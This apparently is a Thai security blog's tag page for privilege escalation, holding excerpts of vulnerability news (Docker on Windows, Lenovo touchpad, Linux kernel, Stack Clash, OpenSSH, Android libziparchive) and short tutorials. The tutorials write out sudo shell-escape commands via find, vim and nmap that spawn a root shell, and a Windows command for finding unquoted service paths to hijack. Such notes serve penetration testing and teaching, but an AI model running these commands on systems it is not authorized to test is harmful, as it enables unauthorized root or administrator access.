Posts by tag
privilege escalation
ทาง Source Incite พบช่องโหว่ในการทำ unserialization ใน Docker บน Windows ทำให้สามารถเพิ่มสิทธิ์ user ไปเป็นสิทธิ์สูงสุดได้ผ่านการทำงานผ่าน docker service ทาง Source Incite พบว่า com.docker.service ซึ่งเป็น docker service บน Windows มีการสร้าง NamedPipes ที่ชื่อว่า dockerBackend และ dockerLogs เมื่อเช็คจาก Pipe Security Viewer พบว่าเป็นสิทธิ์…
พอดีผมไปเจอ blog สำหรับการให้ได้มา shell ที่เป็นสิทธิ์ root ผ่าน command ต่างๆกัน โดยสามารถทำได้ผ่านสารพัดคำสั่งดังนี้ (อธิบายเรื่อง su และ sudo)
1. Find command
2. vim command
3. Nmap command
4. Man command…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
/usr/bin/find /bin/echo /usr/bin/nmap /usr/bin/vim /usr/bin/nano /usr/bin/man /usr/bin/awk /usr/bin/less /usr/bin/ftp /usr/sbin/apache2 /usr/bin/wget /usr/sbin/tcpdump /usr/bin/strace /bin/mount |
1 2 |
sudo find /etc/passwd -exec /bin/sh \; sudo find /bin -name nano -exec /bin/sh \; |
1 |
sudo vim -c '!sh' |
1 2 3 4 5 6 |
# Old version sudo nmap --interactive nmap> !sh sh-4.1# # New version echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse |
@Riscy ได้พบช่องโหว่ใน section object (ตัวระบุตำแหน่ง memory ที่ใช้ทำงานร่วมกับ Application อื่นๆ)ของ Lenovo Touchpad utility ไม่มีการป้องกันการอ่าน/แก้ไข ทำให้ application ใดๆสามารถเข้าไปแก้ไขและส่งผลให้ทำการยกระดับสิทธิ์ของ user ได้ section object มีชื่อว่า “SynTPAPIMemMap” ซึ่งเป็นของ SynTPEnh.exe หรือก็คือ SynTPEnh service ของโปรแกรม Lenovo touchpad utility…
พอดีไปอ่านอันนี้มาแล้วดูอันนี้มีประโยชน์มากในการทำ Privilege Escalation ใน Windows สำหรับ Kernel Exploit ก็เลยเอามาแปะไว้ครับ
อันนี้เป็นการทำสรุปวิธีการพยายามทำ Privilege Escalation ใน Windows ครับ Unquoted Service Paths หา service ที่ไม่ได้ทำ Quoted Path ครับ
ซึ่งถ้าโดยปกติแล้วมันควรจะเป็น
แต่หากเจอว่าเป็น
แสดงว่าเวลา Windows มันทำงานมันจะหาไฟล์เพื่อมารันตามนี้ครับ
ซึ่งหากเราสร้าง exe ไว้ใน path ใด path…
1 |
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ |
1 |
“C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe” |
1 |
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe |
1 2 3 4 5 |
C:\Program.exe C:\Program Files.exe C:\Program Files (x86)\Program.exe C:\Program Files (x86)\Program Folder\A.exe C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe |
Security Researcher พบช่องโหว่ใหม่ในการเพิ่มสิทธิ์ของ user ให้กลายเป็นสิทธิ์สูงสุดใน Linux Kernel ทำให้ user ธรรมดากลายเป็น root ได้ Security Researcher พบช่องโหว่โดย Venustech ADLab (Active-Defense Lab) researchers, โดยช่องโหว่ดังกล่าวได้ CVE number เป็น CVE-2017-15265 ช่องโหว่ดังกล่าวพบใน Advanced Linux Sound Architecture…
Qualys แสดงความสามารถอีกครั้งด้วยการเปิดเผยช่องโหว่ที่ชือว่า “Stack Clash” ทำให้ user สามารถใช้ช่องโหว่ดังกล่าวเพิ่มสิทธิ์ของตัวเองให้กลายเป็นสิทธิ์สูงสุดหรือ root ได้ Qualys พบช่องโหว่ “Stack Clash” ซึ่งทำให้ได้สิทธิ์ root ใน UNIX System ได้ ทาง Qualys พบช่องโหว่นี้ตั้งแต่เมื่อเดือนที่แล้ว (06/2017) และได้แจ้งให้เหล่า vendor ต่างๆไปก่อนแล้ว เพื่อให้ทาง vendor เหล่านั้นออกมา patch…
ในช่วงปี 2015 มีการเปิดเผยช่องโหว่ OpenSSH CVE-2015-6565 ซึ่งเกี่ยวกับ OpenSSH 6.8, 6.9 มีสิทธิ์การเขียนเข้าไปใน TTY อื่นๆได้ทำให้ user ภายในเครื่องใช้สิ่งนี้ไปเขียนทับ TTY อื่นทำให้เกิด crash ได้ หรือมีความเป็นไปได้ที่จะเกิดผลกระทบอื่นๆไปยังอุปกรณ์ได้ ซึ่งในตอนแรกผลสรุปออกมาว่าทำให้เกิด Denial of Service เท่านั้น แต่ ณ ตอนนี้ต้องเปลี่ยนผลกระทบใหม่ เนื่องด้วย Federico Bento สามารถพบวิธีการใช้ช่องโหว่ดังกล่าวแต่ทำให้กลายเป็นการเพิ่มสิทธิ์ของ…
Security Researcher ที่ใช้ชื่อว่า ele7enxxh จาก Chengdu Security Response Center, Qihoo 360 Technology Co. Ltd พบช่องโหว่ใน lib ที่ชื่อว่า libziparchive ซึ่งใช้ในการแตกไฟล์(ใช้กับการแตกไฟล์อย่าง apk file) และช่องโหว่ดังกล่าวได้รับเลข CVE เป็น CVE-2016-6762 โดยหากไฟล์ zip มีค่าของ cd_offset และ…
Recent Comments